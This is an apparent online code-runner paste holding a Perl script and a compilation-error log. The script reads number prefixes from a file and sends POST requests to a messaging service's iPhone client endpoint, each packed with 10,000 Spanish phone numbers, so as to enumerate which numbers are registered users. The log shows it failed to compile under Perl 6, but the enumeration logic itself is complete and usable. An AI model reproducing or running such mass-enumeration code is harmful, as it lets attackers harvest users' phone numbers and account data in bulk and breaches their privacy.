fork download
  1. #!/usr/bin/perl
  2. use LWP::UserAgent;
  3. my $ua = new LWP::UserAgent;
  4. open A,"num.txt";
  5. my @a=<A>;
  6. my $i=0;
  7. foreach my $b (@a){
  8. chomp $b;
  9. foreach $g (0..99) {
  10. $i++;
  11. my $post="";
  12. $post="cd=1&cc=34&me=600000000";
  13. foreach(0..9999) {
  14. $post .= sprintf ("&u%%5B%%5D=%%2B34$b%02d%04d",$g,$_);
  15. }
  16. print "get $i\n";
  17. my $req = new HTTP::Request 'POST','https://s...content-available-to-author-only...p.net/client/iphone/iq.php';
  18. $req->content_type('application/x-www-form-urlencoded');
  19. $req->content("$post");
  20. my $res = $ua->request($req);
  21. print $res->as_string;
  22. }
  23. }
Compilation error #stdin compilation error #stdout 0s 0KB
stdin
Standard input is empty
compilation info
===SORRY!===
Unable to find module 'LWP::UserAgent' in the @*INC directories.
(@*INC contains:
  /home/kad4bT/.perl6/lib
  /usr/lib/parrot/2.7.0/languages/perl6/lib
  .)
stdout
Standard output is empty